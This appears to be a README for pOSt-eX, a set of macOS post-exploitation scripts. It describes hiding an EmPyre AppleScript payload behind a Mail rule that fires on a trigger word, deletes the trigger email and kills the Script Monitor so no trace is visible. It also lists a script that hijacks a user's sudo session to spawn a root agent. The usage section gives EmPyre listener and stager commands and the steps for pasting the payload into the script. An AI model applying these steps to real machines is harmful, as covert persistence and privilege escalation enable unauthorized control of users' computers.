pOSt-eX: Post-exploitation scripts for OS X persistence and privesc
pOSt-eX – OS X post-exploitation scripts
- mail.py – Creates an ApleScript payload with Empire and configures a mail rule to launch it
- persist.py – EmPyre module implementation of mail.py
- monitor.py – Piggybacks off a user’s sudo session to spawn an agent with root privileges
- piggyback.py – EmPye module of monitor.py
MailPersist – Post-exploitation script for OS X persistence
ABOUT:
This script creates a new rule in the OS X Mail application to automatically trigger an AppleScript payload when an email is received using a trigger word in the subject of the email.
The trigger email will be deleted before it is visible. The Script Monitor will also be killed immediately after executing the python stager. There should not be any visual indicators.
Download
git clone https://github.com/n00py/pOSt-eX.git
Usage
Creating an AppleScript payload with Empyre
(EmPyre) > listeners
(EmPyre: listeners) > set Name mylistener
(EmPyre: listeners) > execute
(EmPyre: listeners) > usestager applescript mylistener
(EmPyre: stager/applescript) > execute
Open mail.py and paste the output in the specified area. Modify the trigger word as you see fit.
When pasting the AppleScript payload from Empire, you need to make two modifications:
- Double up the backslash characters
- Remove the final double quote
Tutorial
- https://www.n00py.io/2016/10/using-email-for-persistence-on-os-x/
- https://www.n00py.io/2016/10/privilege-escalation-on-os-x-without-exploits/